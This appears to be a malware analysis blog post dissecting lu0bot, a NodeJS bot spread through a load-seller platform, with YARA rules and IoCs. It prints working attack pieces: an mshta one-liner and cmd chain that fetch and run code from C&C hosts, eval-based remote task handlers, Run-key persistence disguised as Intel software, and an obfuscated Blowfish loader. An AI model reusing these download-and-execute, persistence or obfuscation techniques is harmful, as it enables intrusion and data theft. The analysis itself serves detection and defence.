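ref = os.path.join(workdir, "ntdll.dll")
dup = os.path.join(workdir, "A1B2.tmp")
other = os.path.join(workdir, "other.dll")
for path, content in ((ref, b"ntdll bytes"), (dup, b"ntdll bytes"), (other, b"something else")):
    with open(path, "wb") as handle:
        handle.write(content)
copies = find_identical_copies(ref, [ref, dup, other])
```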
Final Words
While analysing SmokeLoader at work, I stumbled across this AntiHook mechanism, which I hadn't seen before, so I wanted to share it here :-).
I've also only scratched the surface of what Frida is capable of. I might work on something more complex next time.
Lu0bot - An unknown NodeJS malware using UDP
In February/March 2021, a curious lightweight payload was observed on a well-known load seller platform. Unlike the classic info-stealers being pushed at an industrial level, this one is very different from the current landscape and trends. Facing a grey box like this is somewhat stressful, because you have no idea what could be behind it or how it works, but it also means that you will learn far more than during a standard investigation.
I hadn't felt like this since Qulab, an AutoIT malware that gave me some headaches at the time due to its packer. But after cleaning it and realizing it was rudimentary, the challenge was over. Analyzing NodeJS malware is definitely a different approach.
I will just present some current findings. I don't have all the answers, but at least this will leave the door open for further research.
Disclaimer: I don't know the real name of this malware.
Minimalist C/C++ loader
When lu0bot is deployed on a machine, the first stage is a lightweight 2.5 KB payload which has only two section headers.

Written in C/C++, it contains only one function.
void start()
{
char *buff;
buff = CmdLine;
do
{
*(DWORD *)buff -= 'NPJO'; // The key seems random after each build
buff += 4;
}
while ( buff < &CmdLine[424] );
WinExec(CmdLine, 0); // ... to the moon ! \o/
ExitProcess(0);
}
This rudimentary loop decrypts a buffer, unveiling a one-line JavaScript command that is executed through WinExec().
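The same loop is easy to replay offline. The sketch below subtracts a 32-bit key from each little-endian DWORD of a buffer; the key value 0x4E504A4F is merely my reading of the 'NPJO' constant and, as noted in the listing, the real key changes between builds.

```python
import struct

ASSUMED_KEY = 0x4E504A4F  # one interpretation of 'NPJO'; differs per build


def decrypt_cmdline(buf, key):
    """Subtract key from every little-endian DWORD of buf (modulo 2**32)."""
    out = bytearray()
    for off in range(0, len(buf) - len(buf) % 4, 4):
        (dword,) = struct.unpack_from("<I", buf, off)
        out += struct.pack("<I", (dword - key) & 0xFFFFFFFF)
    return bytes(out)


def encrypt_cmdline(buf, key):
    """Inverse operation, only used here to produce test data."""
    out = bytearray()
    for off in range(0, len(buf) - len(buf) % 4, 4):
        (dword,) = struct.unpack_from("<I", buf, off)
        out += struct.pack("<I", (dword + key) & 0xFFFFFFFF)
    return bytes(out)


sample = b"mshta ja"  # 8 bytes, two DWORDs
roundtrip = decrypt_cmdline(encrypt_cmdline(sample, ASSUMED_KEY), ASSUMED_KEY)
```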

Indeed, MSHTA is used to execute this malicious script, so in terms of monitoring it's easy to catch this interaction.
mshta "javascript: document.write();
42;
y = unescape('%312%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%321%616%654%62%7E%321%32').split('~');
103;
try {
x = 'WinHttp';
127;
x = new ActiveXObject(x + '.' + x + 'Request.5.1');
26;
x.open('GET', y[1] + '&a=' + escape(window.navigator.userAgent), !1);
192;
x.send();
37;
y = 'ipt.S';
72;
new ActiveXObject('WScr' + y + 'hell').Run(unescape(unescape(x.responseText)), 0, !2);
179;
} catch (e) {};
234;;
window.close();"
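The escaped string in the script can be decoded without running any of it. In Python, `urllib.parse.unquote` handles the same %XX sequences as JavaScript's unescape for this ASCII input:

```python
from urllib.parse import unquote

ENCODED = (
    "%312%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F"
    "%321%616%654%62%7E%321%32"
)

# Same steps as the script: unescape, then split on '~'.
parts = unquote(ENCODED).split("~")
c2_url = parts[1]
print(parts)
```

The middle element is the URL that the script passes to WinHttpRequest, with the user agent appended in the a parameter.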
Setting up NodeJs
The script above is designed to perform an HTTP GET request to a C&C (let's say it's the first C&C layer). The response is then executed through an ActiveXObject.
new ActiveXObject('WScr' + y + 'hell').Run(unescape(unescape(x.responseText)), 0, !2);
Let's inspect the code (response) step by step
cmd /d/s/c cd /d "%ALLUSERSPROFILE%" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe [...]
- Change the console's working directory to the %ALLUSERSPROFILE% path
- Create a fake folder named DNTException
[...] || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);
x.Open("GET",unescape(WScript.Arguments(0^)^),false^);
x.Send(^);
b = new ActiveXObject("ADODB.Stream"^);
b.Type=1;
b.Open(^);
b.Write(x.ResponseBody^);
b.SaveToFile(WScript.Arguments(1^),2^);
> get1618489872131.txt
& cscript /nologo /e:jscript get1618489872131.txt "http://hri2.xyz/hri/?%HEXVALUE%&b=%HEXVALUE%" node.cab
& expand node.cab node.exe
& del get1618489872131.txt node.cab
) [...]
- Generate JS code that downloads and saves an archive named "node.cab"
- Decompress the cab file with the expand command and rename the result to "node.exe"
- Delete all generated files when it's done
[...] & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1618489872131.txt [...]
- Recreate a JS script that will again execute some code
[...] cscript /nologo /e:jscript get1618489872131.txt "node -e eval(FIRST_STAGE_NODEJS_CODE)" & del get1618489872131.txt [...]
In the end, this whole process is designed for retrieving the required NodeJS runtime.

Matryoshka Doll(J)s
Luckily, the code is in fact pretty well written and comprehensible at this layer. It is about 20 lines of code that build the whole malware thanks to one simple API call: eval.

From my own experience, I'm not usually confronted with malware using the UDP protocol to communicate with C&Cs. Furthermore, I don't think it's usual to switch from TCP to UDP as if it were nothing. When I analyzed it for the first time, I found it odd to see so much noisy activity on the machine with just two HTTP requests. Then I realized that I was watching the visible part of a gigantic iceberg...

For those who are unfamiliar with NodeJS, the script is designed to periodically send UDP requests over port 19584 to two specific domains. When a message is received, it is decrypted with a standard XOR decryption loop, and the output is ready-to-use code that is executed right afterwards with eval. Interestingly, the first byte of the response is also part of the key, which means that each response is likely to look different even if its content is the same.
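To illustrate why a key that depends on the first byte makes identical content look different on the wire, here is a purely hypothetical scheme: the first byte acts as a seed that is prepended to a static key. The real lu0bot key layout is not documented in this article, so every name and detail below is an assumption.

```python
def xor_crypt(body, key):
    """XOR body with a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(body))


def encrypt(plaintext, static_key, seed):
    # Hypothetical layout: seed byte in clear, followed by the XORed body.
    key = bytes([seed]) + static_key
    return bytes([seed]) + xor_crypt(plaintext, key)


def decrypt(message, static_key):
    # The first byte of the message becomes part of the key.
    key = bytes([message[0]]) + static_key
    return xor_crypt(message[1:], key)


first = encrypt(b"eval me", b"k3y", 0x10)
second = encrypt(b"eval me", b"k3y", 0x20)
```

Both messages decrypt to the same script, yet a network signature written for the first one would not match the second.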
In the end, lu0bot basically works like this:

After digging into each piece of executed code, it really feels like playing with matryoshka dolls, due to recursive eval loops unveiling more content and functions over time. It's also the reason why this malware can seem simple and complex at the same time if you aren't experienced with this strategy.

To add to the confusion, it uses different cryptographic algorithms, whether for communications or for storing variable contents:
- XOR
- AES-128-CBC
- Diffie-Hellman
- Blowfish
Understanding Lu0bot variables
S (as Socket)
- Fundamental Variable
- UDP communications with C&Cs
- Receiving main classes/variables
- Executing โmain branchesโ code
function om1(r,q,m) # Object Message 1
|--> r # Remote Address Information
|--> q # Query
|--> m # Message
function c1r(m,o,d) # Call 1 Response
|--> m # Message
|--> o # Object
|--> d # Data
function sc/c1/c2/c3(m,r) # SetupCall/Call1/Call2/Call3
|--> m # Message
|--> r # Remote Address Information
function ss(p,q,c,d) # ScriptSetup / SocketSetup
|--> p # Personal ID
|--> q # Query
|--> c # Crypto/Cipher
|--> d # Data
function f() # UDP C2 communications
KO (as Key Object ?)
- lu0bot mastermind
- Containing all bot information
- C&C side
- Client side
- storing fundamental handle functions for task manager(s)
- eval | buffer | file
ko {
pid: # Personal ID
aid: # Address ID (C2)
q: # Query
t: # Timestamp
lq: {
# Query List
},
pk: # Public Key
k: # Key
mp: {}, # Module Packet/Package
mp_new: [Function: mp_new], # New Packet/Package in the queue
mp_get: [Function: mp_get], # Get Packet/Package from the queue
mp_count: [Function: mp_count], # Packet/Package Counter
mp_loss: [Function: mp_loss], # ???
mp_del: [Function: mp_del], # Delete Packet/Package from the queue
mp_dtchk: [Function: mp_dtchk], # Data Check
mp_dtsum: [Function: mp_dtsum], # Data Sum
mp_pset: [Function: mp_pset], # Updating Packet/Package from the queue
h: { # Handle
eval: [Function],
bufwrite: [Function],
bufread: [Function],
filewrite: [Function],
fileread: [Function]
},
mp_opnew: [Function: mp_opnew], # Create New
mp_opstat: [Function: mp_opstat], # get stats from MP
mp_pget: [Function], # Get Packet/Package from MP
mp_pget_ev: [Function] # Get Packet/Package Timer Intervals
}
MP
- Module Package/Packet/Program ?
- Monitoring and logging an executed task/script.
mp:
{ key: # Key is Personal ID
{ id: , # Key ID (Event ID)
pid: , # Personal ID
gen: , # Starting Timestamp
last: , # Last Tick Update
tmr: [Object], # Timer
p: {}, # Package/Packet
psz: # Package/Packet Size
btotal: # ???
type: 'upload', # Upload/Download type
hn: 'bufread', # Handle name called
target: 'binit', # Script name called (From C&C)
fp: , # Buffer
size: , # Size
fcb: [Function], # FailCallBack
rcb: [Function], # ???
interval: 200, # Interval Timer
last_sev: 1622641866909, # Last Timer Event
stmr: false # Script Timer
}
Ingenious trick for calling functions dynamically
Usually, when you are reversing malware, you are confronted (almost every time) with malware developers hiding API calls with tricks like GetProcAddress or hashing.
function sc(m, r) {
if (!m || m.length < 34) return;
m[16] ^= m[2];
m[17] ^= m[3];
var l = m.readUInt16BE(16);
if (18 + l > m.length) return;
var ko = s.pk[r.address + ' ' + r.port];
var c = crypto.createDecipheriv('aes-128-cbc', ko.k, m.slice(0, 16));
m = Buffer.concat([c.update(m.slice(18, 18 + l)), c.final()]);
m = {
q: m.readUInt32BE(0),
c: m.readUInt16BE(4),
ko: ko,
d: m.slice(6)
};
l = 'c' + m.c; // Function name is now saved
if (s[l]) s[l](m, r);
}
As someone who is not really experienced in the NodeJS environment, I didn't immediately spot the trick performed here, but for a web developer I believe it is likely obvious (or maybe I'm wrong). The thing you really need to pay attention to is what is happening with the "c" char and m.c.
According to the official NodeJS documentation, Buffer.readUInt16BE() is a method of the Buffer class that reads an unsigned, big-endian 16-bit integer from the buffer at the specified offset.
Buffer.readUInt16BE( offset )
In a real case scenario it will return the value "1" here, so the variable l becomes "c1", the name of a function stored in the global variable s. In the end, s["c1"](m,r) means the same as s.c1(m,r).
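The same trick translates directly to Python, where `getattr` plays the role of the bracket lookup. The class and handler bodies below are invented; only the offsets (a 32-bit query at 0, a 16-bit call number at 4) mirror the decrypted message layout read by sc().

```python
import struct


class SocketObject:
    """Stand-in for the global 's' object holding the c1/c2/... handlers."""

    def c1(self, message, remote):
        return "call1"

    def c2(self, message, remote):
        return "call2"


def dispatch(s, payload, remote=None):
    """Build the handler name from the message and call it if it exists."""
    (code,) = struct.unpack_from(">H", payload, 4)  # like m.readUInt16BE(4)
    name = "c%d" % code  # like l = 'c' + m.c
    handler = getattr(s, name, None)  # like s[l]
    if handler is None:
        return None
    return handler(payload, remote)


known = dispatch(SocketObject(), struct.pack(">IH", 7, 1) + b"data")
unknown = dispatch(SocketObject(), struct.pack(">IH", 7, 9) + b"data")
```

Because the function name only exists at runtime, searching the source for direct calls to c1 or c2 finds nothing, which is what makes the control flow harder to follow.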
A well-done task manager architecture
Q variable used as Macro PoV Task Manager
- "Q" is designed to be the main task manager.
- If the Q value is not in LQ, it is added to the LQ stack, and the code content from m (message) is then executed with eval.
if (!lq[q]) { // if query not in the queue, creating it
lq[q] = [0, false];
setTimeout(function() {
delete lq[q]
}, 30000);
try {
for (var p = 0; p < m.d.length; p++)
if (!m.d[p]) break;
var es = m.d.slice(0, p).toString(); // es -> Execute Script
m.d = m.d.slice(p + 1);
if (!m.d.length) m.d = false;
eval(es) // eval, our sweet eval...
} catch (e) {
console.log(e);
}
return;
}
if (lq[q][0]) {
s.ss(ko.pid, q, 1, lq[q][1]);
}
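The part of this handler that matters for an analyst is how the script is cut out of the message: everything up to the first zero byte is the code handed to eval, and the rest stays behind as data. A small Python equivalent, useful for extracting scripts from captured and already decrypted messages, could look like this (the function name is my own):

```python
def split_script(data):
    """Split message data into (script text, remaining bytes or None)."""
    end = data.find(b"\x00")
    if end == -1:
        end = len(data)
    script = data[:end].decode("utf-8", errors="replace")
    rest = data[end + 1:] or None  # mirrors 'if (!m.d.length) m.d = false'
    return script, rest


script, rest = split_script(b"1+1\x00payload")
```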
MP variable used as Micro PoV Task Manager
- "MP" is designed to execute tasks coming from C&Cs.
- Each task is executed independently!
function mp_opnew(m) {
var o = false; // o -> object
try {
o = JSON.parse(m.d); // m.d (message.data) is saved into o
} catch (e) {}
if (!o || !o.id) return c1r(m, -1); // if o empty, or no id, returning -1
if (!ko.h[o.hn]) return c1r(m, -2); // if no functions set from hn, returning -2
var mp = ko.mp_new(o.id); // Creating mp ---------------------------
for (var k in o) mp[k] = o[k]; |
var hr = ko.h[o.hn](mp); |
if (!hr) { |
ko.mp_del(mp); |
return c1r(m, -3) // if hr is incomplete, returning -3 |
} |
c1r(m, hr); // returning hr |
} |
|
function mp_new(id, ivl) { <----------------------------------------------------
var ivl = ivl ? ivl : 5000; // ivl -> interval
var now = Date.now();
if (!lmp[id]) lmp[id] = { // mp list
id: id,
pid: ko.pid,
gen: now,
last: now,
tmr: false,
p: {},
psz: 0,
btotal: 0
};
var mp = lmp[id];
if (!mp.tmr) mp.tmr = setInterval(function() {
if (Date.now() - mp.last > 1000 * 120) {
ko.mp_del(id);
return;
}
if (mp.tcb) mp.tcb(mp);
}, ivl);
mp.last = now;
return mp;
}
O (Object) โ C&C Task
This object receives tasks from the C&C. Technically, this is (I believe) one of the most interesting variables to track in this malware.
- It contains 4 or 5 values
- type
  - upload
  - download
- hn: Handle Name
- sz: Size (before Zlib decompression)
- psz: ???
- target: name of the command/script received from C&C
// o content
{
id: 'XXXXXXXXXXXXXXXXX',
type: 'upload',
hn: 'eval',
sz: 9730,
psz: 1163,
target: 'bootstrap-base.js',
}
In this specific scenario, it's uploading to the bot a file from the C&C called "bootstrap-base.js", which will be processed by the eval function referenced by the handle name (hn).
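To make the return codes of mp_opnew easier to follow, here is a minimal sketch of the same dispatch logic. The handler table below is hypothetical and harmless (the real one exposes eval, bufwrite, bufread, filewrite and fileread), and the function name dispatch is mine, not the malware's.

```javascript
// Hypothetical handler table, standing in for ko.h
const handlers = {
  echo: (task) => 'handled ' + task.target,
  noop: () => false, // a handler that reports a failure
};

// Same decision flow as mp_opnew: parse, validate, look up the handler by hn, run it
function dispatch(raw) {
  let o = false;
  try {
    o = JSON.parse(raw);
  } catch (e) {
    // malformed JSON simply leaves o as false
  }
  if (!o || !o.id) return -1;        // empty object or missing id
  if (!handlers[o.hn]) return -2;    // no handler registered under this handle name
  const hr = handlers[o.hn](o);
  if (!hr) return -3;                // handler did not complete
  return hr;
}

console.log(dispatch('{"id":"a","hn":"echo","target":"bootstrap-base.js"}'));
```

The interesting field for tracking is hn: it is the only thing deciding what the bot does with a task.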
Summary

Aggressive telemetry harvester
Usually, malware gathers information from a new bot extremely fast, but here your VM/machine is literally having a bad time for a solid 7 to 8 minutes.
Preparing environment

Gathering system information
Process info
tasklist /fo csv /nh
wmic process get processid,parentprocessid,name,executablepath /format:csv
qprocess *
Network info
ipconfig.exe /all
route.exe print
netstat.exe -ano
systeminfo.exe /fo csv
Saving Environment & User path(s)

EI_DESKTOP
|--> st.env['EI_HOME'] + '\\Desktop';
EI_DOCUMENTS
|--> st.env['EI_HOME'] + '\\Documents';
|--> st.env['EI_HOME'] + '\\My Documents';
EI_PROGRAMFILES1
|--> var tdir1 = exports.env_get('ProgramFiles');
|--> var tdir2 = exports.env_get('ProgramFiles(x86)');
|--> st.env['EI_HOME'].substr(0,1) + '\\Program Files (x86)';
EI_PROGRAMFILES2
|--> var tdir3 = exports.env_get('ProgramW6432');
|--> st.env['EI_HOME'].substr(0,1) + '\\Program Files';
EI_DOWNLOADS
|--> st.env['EI_HOME'] + '\\Downloads';
Console information
These two variables are basically conditions to check if the process was performed. (ISCONPROBED is set to true when the whole thing is complete).
env["ISCONPROBED"] = false;
env["ISCONSOLE"] = true;
Required values for completing the task:
env["WINDIR"] = val;
env["TEMP"] = val;
env["USERNAME_RUN"] = val;
env["USERNAME"] = val;
env["USERNAME_SID"] = s;
env["ALLUSERSPROFILE"] = val;
env["APPDATA"] = val;
Checking old windows versions
Curiously, it's checking whether the bot is running an old Microsoft Windows version.
- NT 5.X - Windows 2000/XP
- NT 6.0 - Vista
function check_oldwin(){
var osr = os.release();
if(osr.indexOf('5.')===0 || osr.indexOf('6.0')===0) return osr;
return false;
}
exports.check_oldwin = check_oldwin;
This check is then basically used as a condition for adding an extra option to the alternative process listing command
function ps_list_alt(cb){
var cmd = ['qprocess','*'];
if(check_oldwin()) cmd.push('/system');
....
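To see which systems fall into the "old Windows" bucket, the prefix test of check_oldwin can be replayed on a few release strings. This is a small sketch: the function takes the release string as a parameter instead of calling os.release(), and the sample strings are my own picks (XP, Vista, 7 and 10 builds).

```javascript
// Same prefix test as check_oldwin(), but with the release string passed in
function isOldWindows(release) {
  return release.indexOf('5.') === 0 || release.indexOf('6.0') === 0;
}

// Sample kernel versions: XP, Vista, Windows 7, Windows 10
const samples = ['5.1.2600', '6.0.6002', '6.1.7601', '10.0.19045'];
const verdicts = samples.map((r) => [r, isOldWindows(r)]);
console.log(verdicts);
```

Only the NT 5.x and NT 6.0 strings match, so the extra option pushed in ps_list_alt is reserved for 2000/XP/Vista-era systems.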
Checking whether ADS (Alternate Data Streams) can be used for hiding content later

Harvesting functions 101
bufstore_save(key,val,opts) # Save Buffer Storage
bufstore_get(key,clear) # Get Buffer Storage
strstrip(str) # String Strip
name_dirty_fncmp(f1,f2) # Filename Compare (Dirty)
dirvalidate_dirty(file) # Directory Checking (Dirty)
file_checkbusy(file) # Checking if file is used
run_detached(args,opts,show) # Executing command detached
run(args,opts,cb) # Run command
check_oldwin() # Check if Bot OS is NT 5.x or NT 6.0
ps_list_alt(cb) # PS List (Alternative way)
ps_list_tree(list,results,opts,pid) # PS List Tree
ps_list(arg,cb) # PS list
ps_exist(pid) # Check if PID Exist
ps_kill(pid) # Kill PID
reg_get_parse(out) # Parsing Registry Query Result
reg_hkcu_get() # Get HKCU
reg_hkcu_replace(path) # Replace HKCU Path
reg_get(key,cb) # Get Content
reg_get_dir(key,cb) # Get Directory
reg_get_key(key,cb) # Get SubKey
reg_set_key(key,value,type,cb) # Set SubKey
reg_del_key(key,force,cb) # Del SubKey
get_einfo_1(ext,cb) # Get EINFO Step 1
dirlistinfo(dir,limit) # Directory Listing info
get_einfo_2(fcb) # Get EINFO Step 2
env_get(key,kv,skiple) # Get Environment
console_get(cb) # Get Console environment variables
console_get_done(cb,err) # Console Try/Catch callback
console_get_s0(ccb) # Console Step 0
console_get_s1(ccb) # Console Step 1
console_get_s2(ccb) # Console Step 2
console_get_s3(ccb) # Console Step 3
ads_test() # Checking if bot is using ADS streams
diskser_get_parse(dir,out) # Parse Disk Serial command results
diskser_get(cb) # Get Disk Serial
prepare_dirfile_env(file,cb) # Prepare Directory File Environment
prepare_file_env(file,cb) # Prepare File Environment
hash_md5_var(val) # MD5 Checksum
getosinfo() # Get OS Information
rand(min, max) # Rand() \o/
ipctask_start() # IPC Task Start (Interprocess Communication)
ipctask_tick() # IPC Task Tick (Interprocess Communication)
baseinit_s0(cb) # Baseinit Step 0
baseinit_s1(cb) # Baseinit Step 1
baseinit_s2(cb) # Baseinit Step 2
baseinit_einfo_1_2(cb) # Baseinit EINFO
Funky Persistence
The persistence is saved in the classic HKCU Run path
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Intel Management Engine Components 4194521778"="wscript.exe /t:30 /nologo /e:jscript \"C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 750293792\" \"C:\ProgramData\Intel\Intel(R) Management Engine Components\" 2371015226"
Critical files are stored in a fake "Intel" folder in ProgramData.
ProgramData
|-- Intel
|-- Intel(R) Management Engine Components
|--> Intel MEC 246919961
|--> Intel MEC 750293792
Intel MEC 750293792
new ActiveXObject("WScript.shell").Run('"C:\ProgramData\DNTException\node.exe" "' + WScript.Arguments(0) + '\Intel MEC 246919961" ' + WScript.Arguments(1), 0, false);
Intel MEC 246919961
var c = new Buffer((process.argv[2] + 38030944).substr(0, 8));
c = require("crypto").createDecipheriv("bf", c, c);
global["\x65\x76" + "\x61\x6c"](Buffer.concat([c.update(new Buffer("XSpPi1eP/0WpsZRcbNXtfiw8cHqIm5HuTgi3xrsxVbpNFeB6S6BXccVSfA/JcVXWdGhhZhJf4wHv0PwfeP1NjoyopLZF8KonEhv0cWJ7anho0z6s+0FHSixl7V8dQm3DTlEx9zw7nh9SGo7MMQHRGR63gzXnbO7Z9+n3J75SK44dT4fNByIDf4rywWv1+U7FRRfK+GPmwwwkJWLbeEgemADWttHqKYWgEvqEwrfJqAsKU/TS9eowu13njTAufwrwjqjN9tQNCzk5olN0FZ9Cqo/0kE5+HWefh4f626PAubxQQ52X+SuUqYiu6fiLTNPlQ4UVYa6N61tEGX3YlMLlPt9NNulR8Q1phgogDTEBKGcBlzh9Jlg3Q+2Fp84z5Z7YfQKEXkmXl/eob8p4Putzuk0uR7/+Q8k8R2DK1iRyNw5XIsfqhX3HUhBN/3ECQYfz+wBDo/M1re1+VKz4A5KHjRE+xDXu4NcgkFmL6HqzCMIphnh5MZtZEq+X8NHybY2cL1gnJx6DsGTU5oGhzTh/1g9CqG6FOKTswaGupif+mk1lw5GG2P5b5w==", "\x62\x61\x73" + "\x65\x36\x34")), c.final()]).toString());
The workaround is pretty cool in the end
- WScript is launched with /t:30, which caps the script run time at 30 seconds
- The JScript engine is running "Intel MEC 750293792"
- "Intel MEC 750293792" is executing node.exe with the arguments from the upper layer
- This setup is triggering the script "Intel MEC 246919961"
- The integer value from the upper layer(s) is part of the Blowfish key generation
- global["\x65\x76" + "\x61\x6c"] is in fact hiding an eval call
- The encrypted buffer is storing the lu0bot NodeJS loader.
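The key generation and the two hidden strings can be checked without touching the encrypted blob. The sketch below only replays the string operations of "Intel MEC 246919961", assuming the argument 2371015226 seen in the Run key is what ends up in process.argv[2]; it does not decrypt anything.

```javascript
// Assumption: this is the value passed down to node.exe as process.argv[2]
const arg = '2371015226';

// argv values are strings, so "+" concatenates the constant instead of adding it
const keyText = (arg + 38030944).slice(0, 8);
const key = Buffer.from(keyText); // used as both key and IV for the "bf" cipher

// The hex escapes are just plain ASCII strings split in two
const hiddenEval = '\x65\x76' + '\x61\x6c';
const hiddenEncoding = '\x62\x61\x73' + '\x65\x36\x34';

console.log(keyText, key.length, hiddenEval, hiddenEncoding);
```

The constant 38030944 therefore only matters as padding when the argument is shorter than 8 characters; with the value from the Run key, the key is made of the first 8 digits of the argument.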
Ongoing troubleshooting in production?
In some of the commands received, it is possible to see lines of code that are disabled. It is unknown whether it's intended or not, but it's pretty cool to see what the maldev is working on.

It feels like a possible debugging scenario for understanding an issue.

Outdated NodeJS still alive and kickin'
Interestingly, lu0bot is using a very old version of node.exe, way older than could be expected.

This build (0.10.48) is apparently from 2016, so in terms of functionality there is little leeway for exploiting NodeJS, since many of its APIs weren't implemented yet at that time.


The issue mentioned above is "seen" when lu0bot is pushing and executing "bootstrap-base.js". On build 0.10.XXX, "Buffer" wasn't fully implemented yet, so the maldev has implemented the missing function(s) for this specific version. I found this "interesting", because it means lu0bot will stay on a static NodeJS runtime environment that won't change for a while (or likely never). This is a way of avoiding cryptography troubleshooting: between updates, implementations could change and break the whole project. So a fixed build avoids maintenance or unwanted/unexpected hotfixes that could cost the creator of lu0bot too much time and money (everything is business \o/).

Of course, we can't rule out that lu0bot is maybe an old malware, but this statement needs to be taken with caution.
Looking into "bootstrap-base.js", the module is apparently already at version "6.0.15", but based on experience, versioning is always a confusing thing with maldevs: they all have a different approach, so with the current elements it is pretty hard to say more due to the lack of samples.
What is the purpose of lu0bot?
Well, to be honest, I don't know... I hate making suggestions with too little information, it's dangerous and too risky. I don't want to lead people down the wrong path. It's already complicated to explain something with no "public" records, even more so when it is written in a programming language picked for that specific purpose. At this stage, it's smarter to focus on what the code is able to do, and it is certain that it's a decent data collector.
Also, this simplistic and efficient NodeJS loader code at the core of lu0bot is basically everything and nothing at the same time: the eval function and its multi-layer task manager could lead to any possibility, where each action could be totally independent of the others, so think about features like:
- Backdoor ?
- Loader ?
- RAT ?
- Infostealer ?
All scenarios are possible, but as I said before, I could be right or totally wrong.
Where could it be seen?
Currently, it seems that lu0bot is pushed irregularly by the well-known load seller Garbage Cleaner in EU/US zones, with an average of possibly 600-1000 new bots per wave, depending on the operator(s) and days.
Appendix
IoCs
IP
- 5.188.206[.]211
lu0bot loader C&Cs (HTTP)
- hr0[.]xyz
- hr1[.]xyz
- hr2[.]xyz
- hr3[.]xyz
- hr4[.]xyz
- hr5[.]xyz
- hr6[.]xyz
- hr7[.]xyz
- hr8[.]xyz
- hr9[.]xyz
- hr10[.]xyz
lu0bot main C&Cs (UDP side)
- lu00[.]xyz
- lu01[.]xyz
- lu02[.]xyz
- lu03[.]xyz
Yara
rule lu0bot_cpp_loader
{
meta:
author = "Fumik0_"
description = "Detecting lu0bot C/C++ lightweight loader"
strings:
$hex_1 = {
BE 00 20 40 00
89 F7
89 F0
81 C7 ?? 01 00 00
81 2E ?? ?? ?? ??
83 C6 04
39 FE
7C ??
BB 00 00 00 00
53 50
E8 ?? ?? ?? ??
E9 ?? ?? ?? ??
}
condition:
(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and
(filesize > 2KB and filesize < 5KB) and
any of them
}
IoCs
fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2 Lu0bot loader.exe
c88e27f257faa0a092652e42ac433892c445fc25dd445f3c25a4354283f6cdbf Lu0bot loader.exe
b8b28c71591d544333801d4673080140a049f8f5fbd9247ed28064dd80ef15ad Lu0bot loader.exe
5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f Lu0bot loader.exe
f186c2ac1ba8c2b9ab9b99c61ad3c831a6676728948ba6a7ab8345121baeaa92 Lu0bot loader.exe
8d8b195551febba6dfe6a516e0ed0f105e71cf8df08d144b45cdee13d06238ed response1.bin
214f90bf2a6b8dffa8dbda4675d7f0cc7ff78901b3c3e03198e7767f294a297d response2.bin
c406fbef1a91da8dd4da4673f7a1f39d4b00fe28ae086af619e522bc00328545 response3.bin
ccd7dcdf81f4acfe13b2b0d683b6889c60810173542fe1cda111f9f25051ef33 Intel MEC 246919961
e673547a445e2f959d1d9335873b3bfcbf2c4de2c9bf72e3798765ad623a9067 Intel MEC 750293792
Example of lu0bot interaction
ko
{ pid: 'XXXXXX',
aid: '5.188.206.211 19584',
q: XXXXXXXXXX,
t: XXXXXXXXXXXXX,
lq:
{ ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 30 00 00 00 00 09 00 00 26 02> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ] },
pk: 'BASE64_ENCRYPTED',
k: <Buffer 3c 60 22 73 97 cc 76 22 bc eb b5 79 46 3d 05 9e>,
mp:
{ XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function],
interval: 200,
last_sev: XXXXXXXXXXXXX,
stmr: false },
XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
